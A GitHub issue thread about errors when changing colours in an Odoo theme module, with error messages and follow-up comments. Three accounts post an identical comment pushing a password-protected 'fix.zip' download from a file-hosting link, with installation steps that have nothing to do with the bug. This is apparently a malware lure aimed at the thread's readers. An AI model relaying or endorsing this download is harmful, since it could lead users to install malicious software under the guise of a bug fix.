### ISSUE TITLE
Error when modifying colors in settings

### ISSUE THREAD

**Issue by laura-glie** [muk-it/odoo-modules#10]
Good afternoon, how are you? 
I'm having issues in Odoo when modifying the colors in the settings:
![image-20240621-181007](https://github.com/user-attachments/assets/27c2f844-f057-4657-bfb0-b3d100e5fec8)

When I modify some colors, I noticed that two errors appear depending on the number of colors changed. When I try to modify one color, the error that appears is: 
**INTERNAL SERVER ERROR** or this one:
**Error while render the template
ValueError: File(s) /muk_web_colors/static/src/scss/colors_light.scss not found in bundle web._assets_primary_variables
Template: website.layout
Path: /t/html/head/t[12]
Node: <t t-call-assets="web.assets_frontend" t-js="false"/>**

And when I modify more than one, this error appears:
![image-20240621-165123](https://github.com/user-attachments/assets/d530d774-6674-40ef-bda2-31d37d179de1)

I've already pulled all the recent modifications made to the repository, but the error still persists. To resolve it, I need to delete my database and recreate it. Could you provide some support?

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by laura-glie** [comment]
The real problem with changing the colors occurs when I download the WEBSITE app from Odoo itself:

![Captura de Tela 2024-08-26 às 13 43 29 (2)](https://github.com/user-attachments/assets/e3bf263f-9692-437f-aef7-edc495cb2cd0)

**Comment by Aghyksa** [comment]
same i had this problem to.

**Comment by keshrath** [comment]
https://github.com/muk-it/odoo-modules/issues/7
